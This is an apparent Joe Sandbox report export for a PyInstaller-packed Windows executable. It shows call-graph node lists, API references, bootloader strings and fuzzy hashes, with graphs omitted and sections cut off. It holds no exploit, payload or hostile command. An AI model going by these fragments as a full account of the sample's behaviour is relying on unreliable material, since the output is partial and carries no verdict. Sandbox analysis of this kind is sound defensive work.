16067 7ff7c5bd6520 16061->16067 16062 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16064 7ff7c5bd65e8 16062->16064 16063->16065 16064->16022 16076 7ff7c5be66b4 16064->16076 16065->16062 16393 7ff7c5be5f44 16066->16393 16400 7ff7c5be5348 16067->16400 16070 7ff7c5bd651e 16071 7ff7c5bd653a 16070->16071 16074 7ff7c5bd654d __scrt_get_show_window_mode 16070->16074 16077 7ff7c5be66d4 16076->16077 16078 7ff7c5be66c1 16076->16078 16501 7ff7c5be6338 16077->16501 16080 7ff7c5be4444 _wfindfirst32i64 11 API calls 16078->16080 16088 7ff7c5be3e92 16086->16088 16087 7ff7c5be3eb7 16090 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 16087->16090 16088->16087 16089 7ff7c5be3ef3 16088->16089 16104 7ff7c5be21f0 16089->16104 16093 7ff7c5be3ee1 16090->16093 16092 7ff7c5be3fd4 16095 7ff7c5be9e18 __free_lconv_mon 11 API calls 16092->16095 16094 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16093->16094 16097 7ff7c5bd24b4 16094->16097 16095->16093 16097->16007 16098 7ff7c5be3ffa 16098->16092 16101 7ff7c5be4004 16098->16101 16099 7ff7c5be3fa9 16102 7ff7c5be9e18 __free_lconv_mon 11 API calls 16099->16102 16100 7ff7c5be3fa0 16100->16092 16100->16099 16102->16093 16105 7ff7c5be222e 16104->16105 16106 7ff7c5be221e 16104->16106 16107 7ff7c5be2237 16105->16107 16111 7ff7c5be2265 16105->16111 16108 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 16106->16108 16109 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 16107->16109 16110 7ff7c5be225d 16108->16110 16109->16110 16110->16092 16110->16098 16110->16099 16110->16100 16111->16106 16111->16110 16115 7ff7c5be2c04 16111->16115 16148 7ff7c5be2650 16111->16148 16185 7ff7c5be1de0 16111->16185 16116 7ff7c5be2c46 16115->16116 16117 7ff7c5be2cb7 16115->16117 16118 7ff7c5be2ce1 16116->16118 16119 7ff7c5be2c4c 16116->16119 16120 7ff7c5be2d10 16117->16120 16121 7ff7c5be2cbc 16117->16121 16149 7ff7c5be2674 16148->16149 16150 7ff7c5be265e 16148->16150 16151 7ff7c5be26b4 16149->16151 16154 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 16149->16154 
16150->16151 16152 7ff7c5be2c46 16150->16152 16153 7ff7c5be2cb7 16150->16153 16151->16111 16155 7ff7c5be2ce1 16152->16155 16156 7ff7c5be2c4c 16152->16156 16157 7ff7c5be2d10 16153->16157 16158 7ff7c5be2cbc 16153->16158 16154->16151 16241 7ff7c5be0228 16185->16241 16242 7ff7c5be026f 16241->16242 16243 7ff7c5be025d 16241->16243 16394 7ff7c5be5f62 16393->16394 16397 7ff7c5be5f95 16393->16397 16394->16397 16412 7ff7c5bef924 16394->16412 16397->16070 16401 7ff7c5be5364 16400->16401 16402 7ff7c5be53d2 16400->16402 16401->16402 16404 7ff7c5be5369 16401->16404 16446 7ff7c5bef090 16402->16446 16405 7ff7c5be5381 16404->16405 16406 7ff7c5be539e 16404->16406 16413 7ff7c5bef931 16412->16413 16414 7ff7c5bef93b 16412->16414 16413->16414 16449 7ff7c5beeea0 16446->16449 16510 7ff7c5bea620 _CallSETranslator 45 API calls 16509->16510 16512 7ff7c5be50fd 16510->16512 16511 7ff7c5beee97 16531 7ff7c5bdaf14 16511->16531 16512->16511 16515 7ff7c5beedb6 16512->16515 16516 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16515->16516 16517 7ff7c5beee8f 16516->16517 16517->15949 16534 7ff7c5bdaf28 IsProcessorFeaturePresent 16531->16534 16535 7ff7c5bdaf3f 16534->16535 16540 7ff7c5bdafc4 RtlCaptureContext RtlLookupFunctionEntry 16535->16540 16541 7ff7c5bdaff4 RtlVirtualUnwind 16540->16541 16542 7ff7c5bdaf53 16540->16542 16541->16542 16543 7ff7c5bdae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16542->16543 16545 7ff7c5bdfaac 16544->16545 16550 7ff7c5bdfad9 16544->16550 16546 7ff7c5bdfab6 16545->16546 16547 7ff7c5bdfae1 16545->16547 16545->16550 16550->15983 16560 7ff7c5bd2e34 16559->16560 16561 7ff7c5be3be4 49 API calls 16560->16561 16562 7ff7c5bd2e5a 16561->16562 16563 7ff7c5bd2e6b 16562->16563 16591 7ff7c5be4e08 16562->16591 16565 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16563->16565 16566 7ff7c5bd2a8d 16565->16566 16566->15878 16566->15879 16568 7ff7c5bd660e 16567->16568 16569 7ff7c5bd3cb0 116 API calls 16568->16569 16570 7ff7c5bd6635 16569->16570 16571 

Control-flow Graph

APIs
• _get_daylight.LIBCMT ref: 00007FF7C5BF4E65
  • Part of subcall function 00007FF7C5BF47B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF47CC
  • Part of subcall function 00007FF7C5BE9E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E2E
  • Part of subcall function 00007FF7C5BE9E18: GetLastError.KERNEL32(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E38
  • Part of subcall function 00007FF7C5BE9DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C5BE9DAF,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BE9DD9
  • Part of subcall function 00007FF7C5BE9DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C5BE9DAF,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BE9DFE
• _get_daylight.LIBCMT ref: 00007FF7C5BF4E54
  • Part of subcall function 00007FF7C5BF4818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF482C
• _get_daylight.LIBCMT ref: 00007FF7C5BF50CA
• _get_daylight.LIBCMT ref: 00007FF7C5BF50DB
• _get_daylight.LIBCMT ref: 00007FF7C5BF50EC
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C5BF532C), ref: 00007FF7C5BF5113
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 4070488512-239921721
• Opcode ID: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
• Instruction ID: 5b4f327396a9b42a5fc3ec3c3c543d5a87626e8d26306c61f825dc9e22681a3a
• Opcode Fuzzy Hash: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
• Instruction Fuzzy Hash: 0FD1B12AA0865286EB24FF25D5405B9FBA1FF84FA4FC44235DA0D476C6DF3EE4418760

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
• Instruction ID: f737dd5b76567061bcc3da2b810e28fca792003e60428f0cf9cd1e9b8276b805
• Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
• Instruction Fuzzy Hash: 28C1E13AB28A4286EB10EF68C4906AC7B61FB49FA8B851335DE1E577D5CF3AD451C310

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,00000000,?,00007FF7C5BD674D), ref: 00007FF7C5BD681A
  • Part of subcall function 00007FF7C5BD6990: GetEnvironmentVariableW.KERNEL32(00007FF7C5BD36E7), ref: 00007FF7C5BD69CA
  • Part of subcall function 00007FF7C5BD6990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C5BD69E7
  • Part of subcall function 00007FF7C5BE66B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BE66CD
• SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7C5BD68D1
  • Part of subcall function 00007FF7C5BD2770: MessageBoxW.USER32 ref: 00007FF7C5BD2841
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
• String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
• API String ID: 3752271684-1116378104
• Opcode ID: f94b85ae83cde5ff99a73dacb969786b4b90177c333bd4c8ae2eb3a11c31c338
• Instruction ID: cda41878d6fcf474c9fde77384bd5808f9ed1bfaaf7d0375ed16a91f2ba6905e
• Opcode Fuzzy Hash: f94b85ae83cde5ff99a73dacb969786b4b90177c333bd4c8ae2eb3a11c31c338
• Instruction Fuzzy Hash: 39517A11F1D65340FA55BF62A9152BADA419F99FE0FC84031ED0E4B79BED2FE4018360

                                                                                                                        APIs
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50CA
                                                                                                                          • Part of subcall function 00007FF7C5BF4818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF482C
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50DB
                                                                                                                          • Part of subcall function 00007FF7C5BF47B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF47CC
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50EC
                                                                                                                          • Part of subcall function 00007FF7C5BF47E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF47FC
                                                                                                                          • Part of subcall function 00007FF7C5BE9E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E2E
                                                                                                                          • Part of subcall function 00007FF7C5BE9E18: GetLastError.KERNEL32(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E38
                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C5BF532C), ref: 00007FF7C5BF5113
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time

                                                                                                                        Similarity
                                                                                                                        • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                        • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc

                                                                                                                        Similarity
                                                                                                                        • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                        • String ID: D:(A;;FA;;;%s)$S-1-3-4

                                                                                                                        Similarity
                                                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                        • String ID: CreateProcessW$Error creating child process!

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00007FF7C5BD3BA0: GetModuleFileNameW.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD3BD1
                                                                                                                        • SetDllDirectoryW.KERNEL32 ref: 00007FF7C5BD38A5
                                                                                                                          • Part of subcall function 00007FF7C5BD6990: GetEnvironmentVariableW.KERNEL32(00007FF7C5BD36E7), ref: 00007FF7C5BD69CA
                                                                                                                          • Part of subcall function 00007FF7C5BD6990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C5BD69E7
                                                                                                                        Similarity
                                                                                                                        • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                        • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                        • API String ID: 2344891160-3602715111
                                                                                                                        • Opcode ID: 104acf457c9727ee71317e1ea522d3c3f94fcac2246deb33245bf18bb8df501a
                                                                                                                        • Instruction ID: 1629f25c298cfab962bd4660e0508d1c8994d1c08ae450e33b6bc112ca472f20
                                                                                                                        • Opcode Fuzzy Hash: 104acf457c9727ee71317e1ea522d3c3f94fcac2246deb33245bf18bb8df501a
                                                                                                                        • Instruction Fuzzy Hash: 81B19326A1CA8341EA64BF2195512FDEB50FF44FA4FC44131EA4D4769FEE2EE505C720

Control-flow Graph (rendered graph of executed and not-executed basic blocks; not reproduced in this text export)
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: Message
• String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2030045667-1655038675
• Opcode ID: 25c9c53a6fea0ccbab253af0e80c0d64993a775ba4eb7ba4189e9803eb7794a7
• Instruction ID: e44a9acced7b9f42914c470fae8a2f7f132920ddf42179d85bd3f2aefe8629b3
• Opcode Fuzzy Hash: 25c9c53a6fea0ccbab253af0e80c0d64993a775ba4eb7ba4189e9803eb7794a7
• Instruction Fuzzy Hash: 9B51C162A0DA8285EA60BF55E4403BAEA90FB84FB4FC44135DE4D87789EF3EE545C710

Control-flow Graph (rendered graph of executed and not-executed basic blocks; not reproduced in this text export)
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
• Instruction ID: 1ddecbd5c25b85a4dcfa8e8158cb44743130227c19984b2b224432b8f2c769bf
• Opcode Fuzzy Hash: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
• Instruction Fuzzy Hash: 58C1D222A1C68781EA61AF1594402BDFFA5FF81FA0F9D4131DA4D037D2DEBEE8458721

Control-flow Graph (rendered graph of executed and not-executed basic blocks; not reproduced in this text export)
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7C5BEC41B), ref: 00007FF7C5BEC54C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7C5BEC41B), ref: 00007FF7C5BEC5D7
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
• Instruction ID: 2be7c41e50f4e84abfb953669dc0a5cd1c80e5ab6ec2c4695afb3436a8052244
• Opcode Fuzzy Hash: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
• Instruction Fuzzy Hash: 44910922F1865289F760EF2594402BDAFA0FB15FA8F985135DE0E53684CF7EE442C720

Control-flow Graph (rendered graph not reproduced in this text export)

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
• Instruction ID: 0dd28cc906abdd54a4d19c235255520158fad783938cb93163371a6731f45b31
• Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
• Instruction Fuzzy Hash: 14512872F046114BFB18EF64D9426BCABA1BB00B78F985239FD1E52AE5DB7DA401C710

Control-flow Graph (rendered graph not reproduced in this text export)

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 6d39917c2a5e172715dc0149da862f2fc663c363b49fcf3998972eea944cc0d9
• Instruction ID: 07151787458e66993e76b3104519da85cba224ee2bbfff6acfa8bee34958a155
• Opcode Fuzzy Hash: 6d39917c2a5e172715dc0149da862f2fc663c363b49fcf3998972eea944cc0d9
• Instruction Fuzzy Hash: AA51AF26E086428AFB14EF75D4503BDFBA1AF48FA8F988534DE0D57689DF79D4818320

Control-flow Graph (rendered graph not reproduced in this text export)

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 1452418845-0
• Opcode ID: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
• Instruction ID: 026dfe47ce03d903363efab4ace7d5742eb7bafe95264a585b6b8ed6fffc9b89
• Opcode Fuzzy Hash: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
• Instruction Fuzzy Hash: 1E318C26E0C50346FA14BF6594213BDEE81BF51FA4FC44034E94D476DBDE6FA4058A71
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279662727-0
                                                                                                                        • Opcode ID: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                                                                                        • Instruction ID: 6a8e3ac4c5099543f59ba7b30bf9b8b5319fbc0aa928ea7c9c79197ac65cce72
                                                                                                                        • Opcode Fuzzy Hash: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                                                                                        • Instruction Fuzzy Hash: 6F41D522E1878183E714AF219500379EB60FB95B74F549334EA6C03AD5DFBDE5E08750
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                        • Instruction ID: d1bef9ff0b738b11501e5b7169ee6faa68031e391637bc179efb0b0fc1fba7af
                                                                                                                        • Opcode Fuzzy Hash: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                        • Instruction Fuzzy Hash: F351E961B0D68286EA68BF25944067AEA91BF44FF8F984734DD6D477CDCF3EE4018620
                                                                                                                        APIs
                                                                                                                        • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF7C5BEB79D), ref: 00007FF7C5BEB650
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7C5BEB79D), ref: 00007FF7C5BEB65A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
